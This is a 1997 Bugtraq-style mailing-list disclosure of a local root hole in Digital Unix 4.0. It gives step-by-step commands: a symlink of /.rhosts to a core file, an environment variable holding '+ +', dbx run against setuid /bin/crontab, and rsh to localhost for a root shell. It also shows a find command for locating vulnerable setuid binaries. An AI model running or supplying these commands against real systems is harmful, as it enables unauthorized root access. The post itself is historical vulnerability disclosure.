[480] in Best-of-Security
BoS: digital unix 4.0 hole
daemon@ATHENA.MIT.EDU (John McDonald)
Mon Nov 17 20:52:14 1997
X-Delivering-To: best-of-security-mtg@menelaus.mit.edu
Date: Fri, 14 Nov 1997 12:37:20 -0500
Reply-To: John McDonald <jmcdonal@OSPREY.UNF.EDU>
From: John McDonald <jmcdonal@OSPREY.UNF.EDU>
Old-X-Originally-To: To: BUGTRAQ@NETSPACE.ORG
Old-X-Originated-From: From: John McDonald <jmcdonal@OSPREY.UNF.EDU>
Errors-To: best-of-security-request@cyber.com.au
To: best-of-security@cyber.com.au
Resent-From: best-of-security@cyber.com.au
I've verified this on 3 boxes running Digital unix 4.0..
If you run dbx (tested on 3.11.10) on a setuid root program that you have
read access to, the program will core dump and create a root owned 600
perm core in the current directory. You might have to run dbx one or two
times to get it to work.. The message you are looking for is:
dbx version 3.11.10
Type 'help' for help.
warning: /bin/crontab has no symbol table -- very little is supported
without it
Could not attach to process 10112
cannot run program
Exiting due to error during startup
Now, this core dump will follow symlinks.. and using the trick mentioned
earlier with embedding + + in a core dump, you can easily grab root.
ln -s /.rhosts core
BOB42="
+ +
"
export BOB42
dbx /bin/crontab
rsh -l root localhost /bin/sh -i
I'm not sure this will work on other Digital Unix boxes, and I'm not sure
why it works.. So, email me if you get it to work.. I'm not sure, but I
think this might be a bug in the process-tracing implementation..
I think this will locate all of the vulnerable setuid binaries -
find / -perm -4004 -print
humble - jmcdonal@unf.edu
